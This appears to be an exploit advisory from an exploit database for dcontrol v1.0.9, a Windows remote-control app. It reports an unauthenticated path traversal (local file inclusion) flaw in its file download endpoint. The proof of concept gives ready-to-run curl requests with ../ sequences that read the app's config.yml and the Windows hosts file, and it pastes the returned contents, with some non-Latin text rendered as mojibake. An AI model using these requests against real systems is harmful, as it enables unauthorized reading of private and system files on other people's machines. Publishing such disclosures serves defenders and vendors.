## https://sploitus.com/exploit?id=PACKETSTORM:219189
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Local File Inclusion
(LFI)
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol is vulnerable to Local File Inclusion (LFI) via path traversal in
the
/control-api/file/download endpoint. An unauthenticated attacker can read
arbitrary files from the target system by supplying directory traversal
sequences (../) in the 'name' parameter.
# Proof of Concept:
1. Read the application configuration file:
curl "http://TARGET_IP:666/control-api/file/download?name=../config.yml"
name: "่ฟ็จๆงๅถ"
port: 666
open: false
volume: true
dir: files
apps:
- name: ๅพฎไฟก
path: E:\Program Files (x86)\Tencent\WeChat\WeChat.exe
- name: ็ฝๆไบ
path: E:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe
2. Read Windows hosts file:
curl "
http://TARGET_IP:666/control-api/file/download?name=../../../../../../Windows/System32/drivers/etc/hosts
"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost